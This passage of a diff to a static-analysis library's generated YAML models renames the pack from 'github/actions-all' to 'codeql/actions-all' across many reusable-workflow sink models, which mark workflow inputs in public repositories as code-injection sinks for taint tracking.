b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 0f4b87acc62..3a1b8c8403e 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 4b58c4a27b1..9f633ceca2a 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index 36e6df71d47..96eb05c0699 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 444291b0c50..9448aaeabe1 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index ebd11dd1811..d9af00581aa 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index 3dfd3db12f5..aee71d38351 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index a47ce91bf1b..cb06e03a0b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index f4114b0a396..837ac52856b 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index a5b367ab355..737350d2379 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 5aab353540a..3fd4d615778 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index db6b7c28c51..caf13251f20 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index bd2ceb9eeb1..2f8790197e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index d52fc08b2fe..f51482fc02e 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 8a664d1bc87..67b335536ac 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index bbfe6cfc501..514fbac1d52 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 75bbf328d64..6a578723d86 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml 
@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 6cd55f46f64..14afd31d152 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 4c85243e415..772dd2e7c71 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index fd1c5ae4149..477e782dde6 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index d848e7587ca..4d66b285403 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index e2e3fa8f593..8bd5aacbd9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 69d627bdc7f..cd1933d8a23 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 11687fa31b6..9e1b26e1a29 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index 3d394751599..4977c1d9881 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 2fb4ca82763..2fa4322aff4 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 92d91e541b9..5f90523e833 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index ebf68ff3c12..9ffbce337f4 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 22f0fedcc07..2182d445b83 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 23da361034c..1928629382d 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 19a5da19960..59f7022fd89 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index abd0215aada..f2e55b0dc5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 5144d9ee2cb..f92cfbba9c5 100644 
--- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 5a70ae48ec6..09318cf02bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 81130d31fa3..48a3258e7a8 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index f49f239ac9b..cc8afde9d6a 100644 
--- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index 53be189b31e..2960e471d2e 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 2d6132a396f..a4f095a2359 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 0cb5e01e3aa..cba13033669 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index cd3ca5d7c01..3fa02372683 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index c8f1b93ef2d..d31c7ee7804 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index 7877af9bbbf..a270324f866 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 3d9b8716682..58dc1dd30af 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index b14db181cce..7255b0fa879 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 6a883e369c0..b2aacde75df 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index 9612750345d..4bc1aec46a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index 2c6f4438846..1309dc357a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 109b1fefa7b..a76e015ab89 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 87f8bc706b6..b9da0f85225 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 4c2f4e391b5..99e2d783c66 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - 